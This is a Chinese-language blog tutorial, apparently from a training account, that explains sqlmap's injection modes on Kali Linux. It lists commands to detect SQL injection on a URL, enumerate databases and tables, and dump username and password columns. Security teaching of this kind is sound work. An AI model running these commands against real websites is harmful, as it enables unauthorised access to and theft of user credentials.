sqlite 执行多条sql_Kali Linux黑客技:SQL数据库注入攻击实战技巧

本文介绍了Sqlmap这个自动化SQL注入工具,用于检测和利用URL的SQL注入漏洞。Sqlmap支持多种数据库,包括SQLite,并涵盖了基于布尔、时间、报错、联合查询和堆查询的五种注入模式。还详细列举了Sqlmap在Kali Linux中的基本使用方法,从检测SQL注入到获取数据库、表和字段内容。
摘要由CSDN通过智能技术生成

声明:本公众号【最全资料库】所有分享,仅做学习交流,切勿用于任何不法用途,否则后果自负!

d627d138c6ba71d7935712ff0d3e12f0.png

上篇文章,我们给大家讲了什么是SQL注入,那到底怎么判断一个网站是否存在SQL注入漏洞,发现了漏洞又该如何进行注入攻击呢?

SQL注入攻击一般有2种方式,一种工具注入,门槛较低,一种手动注入,要求较高,本文先讲Sqlmap工具注入。

一、首先,Sqlmap是什么?

Sqlmap是一个自动化的SQL注入利器,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞,进行数据库注入攻击。

总结一下,Sqlmap可发现SQL注入漏洞,并利用漏洞进行数据库注入攻击。

三、Sqlmap支持对哪些数据库进行注入攻击?

支持如MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB等数据库

四、Sqlmap支持五种不同的注入模式:

1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。

2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。

3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。

4、联合查询注入,可以使用union的情况下的注入。

5、堆查询注入,可以同时执行多条语句的执行时的注入。

五、Sqlmap常用用法【Kali自带】

1、对url进行检测,判断是否存在SQL注入

sqlmap -u "url" --batch

2.获取数据库

a、获取全部数据库

sqlmap -u URL --dbs --batch

b、获取当前数据库

sqlmap -u URL --current-db --batch

3、获取当前数据库里所有表

sqlmap -u URL -D (数据库) --tables --batch

4、获取表的字段

python sqlmap.py -u URL -D (数据库) -T users --columns --batch

5、dump字段内容

sqlmap -u URL -D (数据库) -T users -C "password,username" --dump --batch

亲爱的同学,如果你有任何学习疑惑,欢迎加到讲师微信:ihaha12,与讲师一对一交流哦!

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值